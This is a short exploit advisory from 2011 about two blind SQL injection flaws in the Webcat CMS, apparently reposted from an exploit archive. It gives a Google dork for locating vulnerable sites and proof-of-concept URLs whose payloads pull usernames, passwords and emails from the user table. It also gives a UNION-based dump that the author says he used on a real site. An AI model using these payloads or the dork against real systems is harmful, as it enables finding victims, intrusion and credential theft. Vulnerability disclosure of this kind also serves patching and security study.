ExploitFixes
Webcat Multiple Blind SQL Injection Vulnerabilities 2011-06-23 09:15:06

# Exploit Title: Webcat - Two Blind SQL Injection Vulnerabilities
# Google Dork: allinurl: sc_webcat/ecat/cms_view.php
# Date: 6/23/2011
# Author: w0rd (w0rd[at]NULL0x00.com)
# Software Link: http://webcat.sourceforge.net/
# Tested on: [Linux/Windows 7]
#Vulnerable Parameters: web_id=, id=
##############################################################
PoC:

http://www.domain.com/sc_webcat/ecat/cms_view.php?lang=1&id=50'
http://www.domain.com/sc_webcat/ecat/cms_view.php?lang=1&web_id=1021'
http://www.domain.com/sc_webcat/ecat/cms_view.php?lang=1&web_id=1021 and ascii(substring((SELECT concat(user_name,0x3a,user_password,0x3a,email,0x0a) FROM usertable limit 0,1),1,1))>80

I have come across one site where it was not blind, and used this:
https://www.domain.com/sc_webcat/ecat/cms_view.php?lang=1&web_id=-1 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(email,0x3a,user_password,0x0a),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90 from usertable--

##############################################################
# Shouts to the Belegit crew